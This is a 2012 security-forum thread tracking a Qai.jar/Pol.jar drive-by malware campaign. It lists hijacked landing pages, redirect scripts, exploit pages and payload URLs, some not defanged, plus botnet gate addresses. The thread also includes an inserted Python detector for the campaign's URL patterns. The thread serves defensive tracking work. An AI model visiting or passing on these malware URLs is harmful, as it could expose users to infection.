
  1. NotBuyingIt on Wed 21 Mar 2012, 09:15:45 PM UTC

    Qai.jar malware (CVE-2010-1885)

    A well-known spam expert is reporting an aggressively promoted malware exploit which uses multiple sites together. Deceptive web pages planted on dozens of sites load a set of JavaScripts which in turn attempt to load a malicious webpage. Several variations were detected yesterday and today.

    This set of scripts
    hXXp://50.57.29.172/hVg3GFAo/js.js
    hXXp://finantariauto.ro/5ZqETXNE/js.js
    hXXp://ipecturkey.com/E2UNfoGY/js.js
    hXXp://oompa.de/VTwQKwDD/js.js
    attempt to load
    hXXp://209.59.217.193/showthread.php?t=d7ad916d1c0396ff
    that leads to malware at
    hXXp://209.59.217.193/q.php?f=ba33
    hXXp://209.59.217.193/content/Qai.jar

    This set of scripts
    hXXp://216.205.49.67/CD5s3Ne3/js.js
    hXXp://activetours.pttk.pl/Eaz0Mz8g/js.js
    hXXp://copymax.gr/jbbaaFCK/js.js
    hXXp://offvip.com/TtMQy1sw/js.js
    hXXp://solocyberday.com/oDYibUuh/js.js
    attempt to load
    hXXp://slickicus.com/showthread.php?t=8d80b8c3f87a9538
    that leads to malware at
    hXXp://slickicus.com/q.php?f=db757
    hXXp://slickicus.com/content/Qai.jar

    This set of scripts
    hXXp://officefurnituremart.com/sT1SFMyf/js.js
    hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
    hXXp://qqprints.com.my/37ErBpvj/js.js
    hXXp://romanjewelers.com/mnbCaEYY/js.js
    hXXp://samx.zzl.org/crF5iYsT/js.js
    attempt to load
    hXXp://slicksphere.com/showthread.php?t=d7ad916d1c0396ff
    but the domain slicksphere.com has been suspended

    Here are some of the deceptive URLs that have been reported earlier today

    Some other reported URLs return HTTP 404 ("Not Found") or their domains have been suspended, so I suspect efforts are underway to combat the malware campaign.

     Data that is stored in the cloud may become lost in the fog.

Comments:

  1. NotBuyingIt on Thu 22 Mar 2012, 01:56:24 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Other people are also reporting virtually the same exploit which is also running on other sites.

    This set of scripts
    hXXp://50.57.29.172/hVg3GFAo/js.js
    hXXp://oompa.de/VTwQKwDD/js.js
    attempts to load
    hXXp://matormaster.com/showthread.php?t=d7ad916d1c0396ff
    that leads to malware at
    hXXp://matormaster.com/q.php?f=ba33e
    hXXp://matormaster.com/content/Qai.jar

    This set of scripts
    hXXp://officefurnituremart.com/sT1SFMyf/js.js
    hXXp://orvosokafrikaert.hu/Bsz1CQg0/js.js
    hXXp://romanjewelers.com/mnbCaEYY/js.js
    hXXp://samx.zzl.org/crF5iYsT/js.js
    attempts to load
    hXXp://slickcurve.com/showthread.php?t=d7ad916d1c0396ff
    that leads to malware at
    hXXp://slickcurve.com/q.php?f=ba33
    hXXp://slickcurve.com/content/Qai.jar

    Here are some of the deceptive URLs that have been reported within the past few hours

  2. c۞g on Thu 22 Mar 2012, 03:48:55 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Qai.jar - 17.07 KB
    VT 0/43
    contents:
    ua.class - 1.04 KB
    cons.class - 4.27 KB
    cr.class - 2.3 KB
    G.class - 3.35 KB
    ub.class - 15.63 KB
    uc.class - 389 Byte
    sys.class - 313 Byte
    results with 404 not found
    matormaster.com/content/Qai.jar
    matormaster.com/q.php?f=ba33e
    50.57.29.172/hVg3GFAo/js.js
    oompa.de/VTwQKwDD/js.js
    officefurnituremart.com/sT1SFMyf/js.js
    orvosokafrikaert.hu/Bsz1CQg0/js.js
    romanjewelers.com/mnbCaEYY/js.js
    samx.zzl.org/crF5iYsT/js.js
    results with: document.location='http://slickcurve.com/showthread.php?t=d7ad916d1c0396ff';

    slickcurve.com resides on IP 173.255.195.167; hXXp://173.255.195.167/showthread.php?t=d7ad916d1c0396ff results in the same malware install.

    50.57.29.172
    173.255.195.167

    oompa.de
    officefurnituremart.com
    orvosokafrikaert.hu
    romanjewelers.com
    samx.zzl.org
    slickcurve.com

    ∞ Opto, ergo sum _https://en.wikipedia.org/wiki/And_You_and_I

  3. NotBuyingIt on Thu 22 Mar 2012, 03:44:28 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Spam email, transmitted via IP 82.127.14.217 (abo.wanadoo.fr), fraudulently claims to be a LinkedIn notice. IP 82.127.14.217 may be blacklisted. The email contains a deceptive URL to a webpage at

    hXXp://butelii-acetilena.ro/59N0J8h1/index.html

    which attempts to load JavaScript from two sources

    hXXp://interspeedy.com.br/zjSxmkDM/js.js
    hXXp://limbongan.com/37hcGs54/js.js

    The scripts, in turn, attempt to redirect to a malicious web page at

    hXXp://bluecellular.com/showthread.php?t=977334ca118fcb8c

    that leads to malware at

    hXXp://bluecellular.com/content/Qai.jar
    hXXp://bluecellular.com/q.php?f=2e457

    The email contains two more suspicious URLs which are either fakes or have already been disabled (HTTP 404):
    http://inepalhotels.com/y7id9XXo/index.html
    http://cgwood.net/U6PcaTcQ/index.html

    [Edit: more]
    Other malicious scripts that redirect to bluecellular.com are at

    hXXp://muttonheadcollective.com/XvLBzokA/js.js
    hXXp://auto-escolas.com/TfFQ7r6J/js.js
    hXXp://rgexcel.com/CPD4MoEs/js.js
    hXXp://turkwebalan.com/oUvuQ0b7/js.js
    hXXp://vita-shop.hu/dSSjc0ag/js.js
    hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
    hXXp://www.bestcar.ee/0AfKWVDW/js.js
    hXXp://www.unimoveis.net/jW57W6aZ/js.js

  4. NotBuyingIt on Thu 22 Mar 2012, 05:42:46 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    bluecellular.com has been suspended; its domain registrar has set its status to clientHold. The malware exploit is now using the newly registered browncellular.com instead.

    hXXp://174.133.92.122/MgGsg1Pp/js.js
    hXXp://myparacord.com/cxW8X8xp/js.js
    hXXp://prace.kupbilet.com/VTDeZmRF/js.js
    hXXp://smapit.com/TaTj4D3f/js.js
    hXXp://thebestguide1.com/arKwG4pE/js.js
    hXXp://www.aeceventos.com.br/zEQSTHfq/js.js
    hXXp://www.extrhema.com.br/cVspcegd/js.js
    hXXp://www.industriacaxiense.com.br/HLAeMSAd/js.js
    hXXp://www.inkontro.com/CXxLMToy/js.js
    hXXp://www.inkontro.it/9e85Bru8/js.js
    hXXp://www.teodo-tivat.com/osJYHU6u/js.js
    hXXp://mrsmakeit.com/9jrgDjED/js.js

    attempt to redirect to a malicious web page at

    hXXp://browncellular.com/showthread.php?t=d7ad916d1c0396ff

    that leads to malware at

    hXXp://browncellular.com/content/Qai.jar
    hXXp://browncellular.com/content/ap2.php?f=7245d

  5. NotBuyingIt on Thu 22 Mar 2012, 08:41:40 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Deceptive URLs at

    hXXp://espacoquatro.com.br/3qZfYFbh/index.html
    hXXp://sauschamber.com/sgc1MBef/index.html

    load scripts from some or all of the following sources

    hXXp://skueez.com/jKtfRnuL/js.js
    hXXp://nhb.prosixsoftron.in/cJHrkMSb/js.js
    hXXp://boemelparty.be/vnB4GozT/js.js
    hXXp://www.alpine-turkey.com/YfTXsaR5/js.js
    hXXp://sas.hg.pl/Th5Da66c/js.js
    hXXp://www.vinhthanh.com.vn/8cACpVEr/js.js

    that attempt to redirect to a malicious web page at

    hXXp://cyancellular.com/showthread.php?t=d44175c6da768b70

    that, in turn, leads to malware at

    hXXp://cyancellular.com/content/Qai.jar
    hXXp://cyancellular.com/q.php?f=44c23

    Acknowledgement: I saw most of the URLs listed in this comment in the current malwaredomainlist.com report.

  6. NotBuyingIt on Thu 22 Mar 2012, 09:48:57 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    A deceptive URL at

    hXXp://www.kozmodisk.net/enzfjWNu/index.html

    loads scripts from all of the following sources

    hXXp://auto-escolas.com/TfFQ7r6J/js.js
    hXXp://muttonheadcollective.com/XvLBzokA/js.js
    hXXp://rgexcel.com/CPD4MoEs/js.js
    hXXp://turkwebalan.com/oUvuQ0b7/js.js
    hXXp://vita-shop.hu/dSSjc0ag/js.js
    hXXp://wilbrahamweddings.co.uk/qsTCVQXM/js.js
    hXXp://www.bestcar.ee/0AfKWVDW/js.js
    hXXp://www.unimoveis.net/jW57W6aZ/js.js

    that attempt to redirect to a malicious web page at

    hXXp://purplecellular.org/showthread.php?t=d7ad916d1c0396ff

    that leads to a suspicious file at

    hXXp://purplecellular.org/content/Qai.jar

  7. NotBuyingIt on Thu 22 Mar 2012, 10:55:51 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Currently, many of the malware exploit's intermediary JavaScript files, including these

    hXXp://thebestguide1.com/arKwG4pE/js.js
    hXXp://www.extrhema.com.br/cVspcegd/js.js
    hXXp://mrsmakeit.com/9jrgDjED/js.js

    redirect to a malicious webpage at

    hXXp://whitecellular.org/showthread.php?t=d7ad916d1c0396ff

    which leads to the suspicious file

    hXXp://whitecellular.org/content/Qai.jar

  8. MarkGiles on Fri 23 Mar 2012, 04:51:49 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has a random 8-character string in the URL. They are sequenced from most frequent (127 hits) to least frequent (1 hit).

    List of domains/hosts:

  9. NotBuyingIt on Fri 23 Mar 2012, 05:33:32 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    hXXp://www.aiopgiovani.it/FoSxV9z1/index.html

    loads scripts from all of the following sources

    hXXp://www.bestcar.ee/0AfKWVDW/js.js
    hXXp://turkwebalan.com/oUvuQ0b7/js.js
    hXXp://www.unimoveis.net/jW57W6aZ/js.js
    hXXp://uttonheadcollective.com/XvLBzokA/js.js

    which redirect to a malicious webpage at

    http://azurecellular.com/showthread.php?t=d7ad916d1c0396ff

    which leads to the suspicious file

    hXXp://azurecellular.com/content/Qai.jar

    Many of the scam sites hosting Qai.jar may be divided into two groups, based upon their creation date.

    Creation Date: 13-mar-2012
    slickcurve.com (clientHold)
    slickicus.com (clientHold)
    slickidian.com (clientHold)
    slicksphere.com (clientHold)
    slickvard.com (IP 74.91.120.189)

    Creation Date: 22-mar-2012
    azurecellular.com (IP 209.59.217.78)
    bluecellular.com (clientHold)
    browncellular.com (IP 174.140.168.207)
    cyancellular.com (clientHold)
    purplecellular.org (CLIENT HOLD)
    whitecellular.org (CLIENT HOLD)

  10. NotBuyingIt on Fri 23 Mar 2012, 02:54:50 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    To the currently active sites created on 22-mar-2012, add

    indigocellular.com (IP 209.59.218.102)
    jadecellular.com (72.249.104.75)

    The people behind the exploit are able to occasionally change the JavaScript (.js) files that are being used to redirect to the *cellular destination sites. Here are some that are currently active.

    Perhaps several hundred deceptive URLs are using those JavaScript files. Here are some that are currently active.

  11. NotBuyingIt on Fri 23 Mar 2012, 07:24:19 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    This deceptive URL
    hxxp://bde-essec.com/aA4mQQKz/index.html
    links to webpages that use this set of scripts
    hxxp://bscert.eu/CAgADsB0/js.js
    hxxp://www.frogeen.com/hPPP5CqE/js.js
    which attempt to load
    hxxp://wildesthopper.com/showthread.php?t=73a07bcb51f4be71
    that leads to this suspicious file
    hxxp://wildesthopper.com/content/Qai.jar

    wildesthopper.com (IP 96.9.151.220)
    Domain Record created on 03-23-2012

    bronzecellular.com (IP 96.9.151.220)
    Creation Date: 22-mar-2012

    Update:
    www.aeceventos.com.br/zEQSTHfq/js.js
    now redirects to a malicious webpage at
    176.28.18.135:8080/showthread.php?t=73a07bcb51f4be71

  12. MarkGiles on Sat 24 Mar 2012, 10:11:05 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Additional entries

    List of domains/hosts:

  13. MarkGiles on Sat 24 Mar 2012, 10:23:42 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    * Sample URLs
    a.releasenotice.com/t/c/1058/smarter/vz88.html
    a.suggestedconcept.com/t/c/1875/archive/gz26803.html
    about.helpfindpotential.com/t/c/167/sure/ez29941.html
    about.outcomeconsultants.com/t/c/2370/views/sz185881.html
    aceite.jshayeb.com.br/Xi73WgtU/index.html
    ageoflongju.kilu.de/aA4mQQKz/index.html
    agg.org.gt/Xi73WgtU/index.html
    akwajaro.com.pl/aA4mQQKz/index.html
    all.victorycommittee.com/t/c/797/complete/tz65450.html
    altoadige.alpinefitness.it/049vGEF4/index.html

    * And redirecting scripts
    avellanedain.com/8caDrgtq/js.js
    chroniquesradios.com/7KnKEoKm/js.js

    redirected to malware (Zeus) infection site
    66.151.244.223/showthread.php?t=73a07bcb51f4be71

    Malware analysis is at
    http://wepawet.iseclab.org/view.php?hash=1d502778a...

    Descriptions of the malware infectors
    * Adobe Libtiff integer overflow in Adobe Reader and Acrobat CVE-2010-0188 = http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-...
    * HCP URL Help Center URL Validation Vulnerability CVE-2010-1885 = http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-...

  14. c۞g on Sat 24 Mar 2012, 10:28:34 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    http://66.151.244.223/showthread.php?t=73a07bcb51f4be71
    http://66.151.244.223/content/Qai.jar

    66.151.244.223

  15. MarkGiles on Sat 24 Mar 2012, 10:53:13 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    This campaign was last seen at 2012-03-23 18:00

    There have been no matching patterns (/ 8 random characters / index.html) since that time.
    The pattern may have changed . . . . or the campaign may have stopped.
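
A small detector for the URL shapes this thread keeps reporting (an 8-character directory followed by index.html or js.js, showthread.php?t=<16 hex>, q.php or ap2.php?f=<hex>, content/Qai.jar or data/Pol.jar), run over a constructed proxy log to pull out the clients that walked the chain all the way to the jar rather than just the ones that touched a landing page. This is an added example, not code from the forum, any poster, or malwaredomainlist; the log lines, the .example hostnames and the stage names are my own constructions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Path/query shapes reported in this thread. The 8-character directory and the
# 16-hex "t" value are the forum's observations; the stage names are assumptions.
STAGES = (
    ("landing",  re.compile(r"^/[A-Za-z0-9]{8}/index\.html$"), None),
    ("script",   re.compile(r"^/[A-Za-z0-9]{8}/js\.js$"), None),
    ("redirect", re.compile(r"^/showthread\.php$"), ("t", r"[0-9a-f]{16}")),
    ("exploit",  re.compile(r"^(?:/content|/data)?/(?:q|ap2)\.php$"), ("f", r"[0-9a-f]{4,6}")),
    ("payload",  re.compile(r"^(?:/content|/data)?/(?:Qai|Pol)\.jar$"), None),
)


def normalize(url):
    """Undo hXXp:// defanging and add a scheme so urlparse sees a host."""
    url = re.sub(r"^h[xX]{2}p(s?)://", r"http\1://", url.strip())
    if "://" not in url:
        url = "http://" + url
    return url


def classify(url):
    """Return the campaign stage a URL matches, or None if it matches nothing."""
    parts = urlparse(normalize(url))
    query = parse_qs(parts.query)
    for stage, path_re, param in STAGES:
        if not path_re.match(parts.path):
            continue
        if param is None:
            return stage
        name, value_re = param
        # A matching path with the wrong parameter shape (e.g. a real forum's
        # showthread.php?t=12345) is not counted as this campaign.
        if re.fullmatch(value_re, query.get(name, [""])[0]):
            return stage
    return None


def walk_chain(log_lines):
    """Group log lines of the form '<timestamp> <client> <url>' by client and
    return, per client, the ordered list of campaign stages it requested."""
    chains = {}
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        stage = classify(fields[2])
        if stage:
            chains.setdefault(fields[1], []).append(stage)
    return chains


def clients_reaching_payload(log_lines):
    """Clients whose requests include the exploit page or the jar itself:
    those are the hosts to image, not the ones that only saw a landing page."""
    return sorted(client for client, stages in walk_chain(log_lines).items()
                  if "payload" in stages or "exploit" in stages)


# Constructed proxy log: one client completes the chain, one is cut off after
# the script stage, one only visits look-alike but unrelated paths.
SAMPLE_LOG = [
    "2012-03-22T09:15:01Z 10.0.0.5 hxxp://landing.example/jXh3opQk/index.html",
    "2012-03-22T09:15:02Z 10.0.0.5 hxxp://script.example/VTwQKwDD/js.js",
    "2012-03-22T09:15:03Z 10.0.0.5 hxxp://slickcurve.com/showthread.php?t=d7ad916d1c0396ff",
    "2012-03-22T09:15:04Z 10.0.0.5 hxxp://slickcurve.com/q.php?f=ba33",
    "2012-03-22T09:15:05Z 10.0.0.5 hxxp://slickcurve.com/content/Qai.jar",
    "2012-03-22T09:20:11Z 10.0.0.9 hxxp://landing.example/aA4mQQKz/index.html",
    "2012-03-22T09:20:12Z 10.0.0.9 hxxp://script.example/CAgADsB0/js.js",
    "2012-03-22T09:21:00Z 10.0.0.7 http://forum.example/showthread.php?t=12345",
    "2012-03-22T09:22:00Z 10.0.0.7 http://cdn.example/assets/js.js",
]

if __name__ == "__main__":
    for client, stages in walk_chain(SAMPLE_LOG).items():
        print(client, "->", " > ".join(stages))
    print("pull for forensics:", clients_reaching_payload(SAMPLE_LOG))
```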

  16. NotBuyingIt on Sun 25 Mar 2012, 05:33:38 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    85.214.243.87:8080/showthread.php?t=d7ad916d1c0396ff
    (param name='archive'value='http://85.214.243.87:8080/content/Qai.jar')
    http://www.google.com/safebrowsing/diagnostic?site...

    These three deceptive URLs
    belocal.us/sgENCGn0/index.html
    carolacanobra.cl/BNqQuXZM/index.html
    crank2-derfilm.de/gkvorsrU/index.html
    load these previously reported scripts
    avellanedain.com/8caDrgtq/js.js
    chroniquesradios.com/7KnKEoKm/js.js
    which currently redirect to malware at
    72.14.184.90/showthread.php?t=73a07bcb51f4be71
    72.14.184.90/content/ap2.php?f=14095 [CVE-2010-0188, CVE-2010-1885]

  17. NotBuyingIt on Mon 26 Mar 2012, 04:41:19 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    88.85.99.44:8080/showthread.php?t=73a07bcb51f4be71
    88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff
    88.85.99.44:8080/Qai.jar

    [Edit: add 23:15 UTC]
    hXXp://88.85.99.44/pony/gate.php (Caution from http://www.spamhaus.org/sbl/query/SBL134160)

    b-dash.jp/5FP2YpGU/index.html
    110.50.202.195/5FP2YpGU/index.html

    The following redirection target does not currently respond and I have seen no adverse reports about it
    184.82.202.46/showthread.php?t=d7ad916d1c0396ff

  18. NotBuyingIt on Tue 27 Mar 2012, 05:29:16 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Note: The following web page (reported earlier) is still online and active; however the external JavaScript that it uses has been removed.
    thechange180.com/QnXBRiWS/index.html

  19. NotBuyingIt on Tue 27 Mar 2012, 06:42:15 AM UTC

    RE: aiopgiovani.it (Qai.jar malware)

    Cross-reference: This comment replies to http://www.mywot.com/forum/21598-case-closed-ai...

    Here are the reported malicious webpages on aiopgiovani.it. Perhaps they have been disabled, but the server doesn't return HTTP 404.
    URL | First Seen | Last Seen
    hXXp://www.aiopgiovani.it/CJbRz2fy/index.html | 2012-03-22 08:28:23 | 2012-03-22 15:53:52
    hXXp://www.aiopgiovani.it/DRk5XAM2/index.html | 2012-03-22 15:53:52 | (same)
    hXXp://www.aiopgiovani.it/enzfjWNu/index.html | 2012-03-22 12:34:38 | 2012-03-22 15:53:53
    hXXp://www.aiopgiovani.it/fbKKzzY1/index.html | 2012-03-22 15:53:54 | (same)
    hXXp://www.aiopgiovani.it/FoSxV9z1/index.html | 2012-03-22 15:53:55 | 2012-03-23 00:15:29
    hXXp://www.aiopgiovani.it/KR29WqKT/index.html | 2012-03-22 15:53:55 | (same)
    hXXp://www.aiopgiovani.it/qHBi6ELG/index.html | 2012-03-22 15:53:56 | (same)
    hXXp://www.aiopgiovani.it/R1oGTgYa/index.html | 2012-03-22 15:53:56 | (same)

  20. NotBuyingIt on Wed 28 Mar 2012, 04:07:54 AM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    The name of the Java archive has changed to Pol.jar

    74.91.114.84/showthread.php?t=73a07bcb51f4be71
    74.91.114.84/content/ap2.php?f=14095

    wildestbug.com/showthread.php?t=73a07bcb51f4be71 (site unresponsive)
    wildestbug.com/data/ap2.php?f=14095
    wildestbug.com/data/Pol.jar

    buzzbackpackers.com/zkNQ6jvK/index.html
    cuzco-peru.travel/HavrCsjG/index.html
    billdirect.jiffyinc.com/Lm2Rtpmd/js.js
    emme3w-vps.m3w.it/agUgfPP0/js.js
    186.5.23.154:8082/showthread.php?t=73a07bcb51f4be71
    186.5.23.154:8082/data/Pol.jar
    186.5.23.154:8082/q.php?f=14095

    91.121.178.156:8080/showthread.php?t=73a07bcb51f4be71 (unstable connections)
    91.121.178.156:8080/q.php?f=14095

  21. NotBuyingIt on Wed 28 Mar 2012, 08:07:53 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    alessandromassaini.com.br/iQQvWcsE/index.html
    fiktiv.hr/EHg4pBAK/index.html
    cubica.com.ec/xr54cK4e/js.js (HTTP 404)
    animahu.com/kvyMGCHQ/js.js (HTTP 404)
    agenciatransfusional.com.br (HTTP 404)

    62.112.130.165:8080/showthread.php?t=73a07bcb51f4be71 (site unresponsive)
    62.112.130.165:8080/q.php?f=14095

    186.5.23.154:8082/showthread.php?t=73a07bcb51f4be71 (site unresponsive)
    186.5.23.154:8082/data/ap2.php?f=14095
    186.5.23.154:8082/data/Pol.jar

    176.28.18.135/pony/gate.php (Caution from: http://www.threatexpert.com/report.aspx?md5=99fab9... )

     Data that is stored in the cloud may become lost in the fog.

  22. User picture
    • NotBuyingIt on Thu 29 Mar 2012
    • 08:23:25 AM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    The following site may reply with HTTP 403 to some requests, but these URLs are active. The meta tag "robots" is set to "noindex, nofollow".
    clearschooner.com/showthread.php?t=73a07bcb51f4be71
    50.56.208.113:8080/showthread.php?t=73a07bcb51f4be71
    clearschooner.com/showthread.php?t=d7ad916d1c0396ff
    clearschooner.com/data/Pol.jar

    www.gavinhall.com:8080

    50.116.50.82/showthread.php?t=d7ad916d1c0396ff
    50.116.50.82/data/ap2.php?f=ba33e
    50.116.50.82/data/Pol.jar
    crypt.im/pls.exe

    [Edit: Update on 29-March-2012 18:00 UTC]
    clearschooner.com (Creation Date: 28-mar-2012) has been suspended; its domain registrar, MONIKER ONLINE SERVICES, INC, has set its status to clientHold. Its DNS (monikerdns.net) continues to link it to IP 50.116.50.82 on the Linode Network in the USA; however, the server at that IP address appears to have gone offline.

    Readers who are following this botnet may wish to examine any similarly named domains which were created near the same time as clearschooner.com

    50.56.208.113:8080/showthread.php?t=d7ad916d1c0396ff
    50.56.208.113/showthread.php?t=73a07bcb51f4be71
    50.56.208.113:8080/data/ap2.php?f=ba33e
    50.56.208.113:8080/data/Pol.jar
    crypt.im/pls.exe
    hXXp://www.gavinhall.com:8080/showthread.php?t=73a07bcb51f4be71

    edildomec.it/BULgi6Hg/index.html
    hayatiinanc.com/4TNmo63B/js.js
    a-tec.it/rnVbcJUC/js.js
    ftp.ilhadesantorini.com.br/nQ87ky7Y/js.js
    swissmobiledevelopment.ch/K7Q2vq48/js.js
    88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff (reported previously)
    88.85.99.44:8080/q.php?f=ba33

    83.174.131.142:8080/showthread.php?t=d7ad916d1c0396ff (unresponsive site)
    83.174.131.142:8080/data/ap2.php?f=ba33e

     Data that is stored in the cloud may become lost in the fog.

  23. User picture
    • NotBuyingIt on Thu 29 Mar 2012
    • 06:37:21 PM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    becas-mexico.com/BULgi6Hg/index.html
    csu.com.vn/yXtPP0kN/index.html
    drgurkantellioglu.com/wAkuxoFT/index.html
    facturaciondigitaldelsureste.com/70U3uLRg/index.html
    www.gapinternational.com/yoPC0eVM/index.html

    174.120.119.209/LKwTTdC2/js.js
    a5numerique.fr/dSQi0euk/js.js
    elitamilano.org/6X4tQf6G/js.js
    gpatrol.com/XwWWQjzf/js.js
    maranatur.com.br/6Y701bwW/js.js
    nogalesdelarroyo.com.ar/6JHV6fR2/js.js
    ofgcompany.com/ZV2RAg5b/js.js
    telefonspass24.de/w2ziooxT/js.js
    uglyd.com/xTnfi7mG/js.js

     Data that is stored in the cloud may become lost in the fog.

  24. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 12:39:12 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    cashundercontrol.com/a1UZ9Deb/index.html
    cashundercontrol.com/y2yMPUY4/index.html
    cashundercontrol.com/xyicUbfE/index.html
    www.fondazionefc.it/xyicUbfE/index.html
    www.fondazionefc.it/zdG4P9ud/index.html
    www.fondazionefc.it/hnTkQu4T/index.html
    www.glassinitstyle.com/1KQCaT1n/index.html
    www.glassinitstyle.com/dbcrLxFh/index.html
    www.glassinitstyle.com/zdG4P9ud/index.html
    www.gsimoveis.net/zdG4P9ud/index.html
    ilhanirem.org/y2yMPUY4/index.html
    joelwieme.nl/jbx2DaYQ/index.html
    joelwieme.nl/2yLAvXvs/index.html
    joelwieme.nl/JhTyt0DK/index.html
    misshealthclub.com/ubTwv5QW/index.html
    misshealthclub.com/AjaAHS1k/index.html
    misshealthclub.com/RyCBUbaq/index.html
    niveran.it/MCqWAeMj/index.html
    niveran.it/AjaAHS1k/index.html
    niveran.it/29rZYVvY/index.html
    pothencia.com.br/0aGbTUcC/index.html
    pothencia.com.br/EXU7LG5U/index.html
    pothencia.com.br/yXtPP0kN/index.html
    revistadecines.com/hnTkQu4T/index.html
    revistadecines.com/WR7whto8/index.html
    revistadecines.com/y2yMPUY4/index.html
    rumski.com/EXU7LG5U/index.html
    rumski.com/0aGbTUcC/index.html
    rumski.com/erkEVBhG/index.html
    sprzedazownia.nets.pl/hnTkQu4T/index.html
    sprzedazownia.nets.pl/y2yMPUY4/index.html
    sprzedazownia.nets.pl/xyicUbfE/index.html
    stonechurchberlin.org/2yLAvXvs/index.html
    stonechurchberlin.org/jbx2DaYQ/index.html
    stonechurchberlin.org/yXtPP0kN/index.html

    shultzfamily.com/6bCo6tHS/js.js

     Data that is stored in the cloud may become lost in the fog.

  25. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 03:46:49 PM UTC

    RE: (CVE-2010-0188) (CVE-2010-1885)

    [Edit: Added more sites 30-March-2012 16:28 UTC]

    168.144.168.82/kFfxpaXa/index.html
    ftp.damipas.altervista.org/kFfxpaXa/index.html
    ilarun.altervista.org/HYfgma9c/index.html
    maicolzonta.altervista.org/HYfgma9c/index.html
    ftp.gondwana14.org/v2NuNqQD/index.html
    isantamaria.com.ar/xYjS3FuU/index.html
    i-terra.com.ar/MCqWAeMj/index.html
    palmerovucovich.com.ar/cKAf4D1t/index.html
    petrogroup.info/cKAf4D1t/index.html
    rbtour.com.br/CYagS9aU/index.html
    senseoftaste.co.za/cKAf4D1t/index.html
    sneska.rs/cKAf4D1t/index.html
    stonechurchberlin.org/JhTyt0DK/index.html

    alfredodeluque.com.co/3WuiAbPd/js.js
    hdmiwebshop.nl/KXQ9MgMa/js.js [see Note 1 below]
    laurencecoiffure-isabelleesthetique.fr/yBKpyA9p/js.js
    raora.net/pszrL8tz/js.js
    riveradominguez.com/Wkin8E8z/js.js
    vianatura.sk/1jWreEwC/js.js

    174.140.163.119/showthread.php?t=d7ad916d1c0396ff
    174.140.163.119/q.php?f=ba33e

    [Edit: Update 06-April-2012 05:00 UTC] [Edit: fixed URL (below) 13-January-2013 17:45 UTC]
    Note 1: See http://www.mywot.com/forum/21906-hdmiwebshop-nl...

     Data that is stored in the cloud may become lost in the fog.

  26. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 05:52:08 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    4realpeople.info/qedwZQiv/index.html
    interfinbrok.ro/1xmg2qrr/index.html
    jadore-events.ro/qedwZQiv/index.html
    kazahana.hanabie.com/FP817PwV/index.html
    kgncomputers.com/1xmg2qrr/index.html
    tajgo.com/hQLv8GxT/index.html

    giantsportsonline.co.za/kwcmbJgu/js.js
    orthokspecialist.co.uk/NN86eMN3/js.js
    pavelknotek.cz/aRLw3hH2/js.js
    renewcarvings.com/EXHRnDGP/js.js

     Data that is stored in the cloud may become lost in the fog.

  27. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 09:22:51 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    fdu.com.ve/dbcrLxFh/index.html
    gatitas69.es/7irbmfgK/index.html
    www.importladen.de/HYfgma9c/index.html
    izmircvb.org.tr/5pE362Xa/index.html
    krownaptel.com/29rZYVvY/index.html
    lagiostranelparco.it/5pE362Xa/index.html
    lindasbolsas.com.br/tsdBCGco/index.html [frequently reported, but responds "suspended page"]
    longfeng.cz/2yLAvXvs/index.html
    matcherup.com/qJQ0G8Ak/index.html
    mespapromosyon.com/2yLAvXvs/index.html
    pagd.info/yXtPP0kN/index.html
    parentproject.ro/2yLAvXvs/index.html
    pvrbluo.com/jbx2DaYQ/index.html
    reactcommunications.com/2KHQEgJc/index.html
    salonslabirebucuresti.ro/2yLAvXvs/index.html
    sevgiliyekurabiye.com/erkEVBhG/index.html
    shoppingbeiramar.com.br/yXtPP0kN/index.html
    sidomunculherbal.com/0aGbTUcC/index.html
    sropazar.org/yXtPP0kN/index.html
    terramaresturismo.com.br/2yLAvXvs/index.html

    netitec.com.br/yGGhKNze/js.js
    thecoffin.ghostdesign.com/v6QWF51L/js.js

    178.32.160.255:8080/showthread.php?t=d7ad916d1c0396ff
    178.32.160.255:8080/q.php?f=ba33e
    178.32.160.255:8080/data/ap2.php

     Data that is stored in the cloud may become lost in the fog.

  28. User picture
    • NotBuyingIt on Sat 31 Mar 2012
    • 01:13:32 AM UTC

    RE: (CVE-2010-0188) (CVE-2010-1885)

    10354.w54.wedos.net/qJQ0G8Ak/index.html
    adsorbtech.in/BZBmikS1/index.html
    cinecolorlab.com.ar/cs1TiGfh/index.html
    hascrafts.com/myg56Y48/index.html
    internauta.org.ar/5pE362Xa/index.html
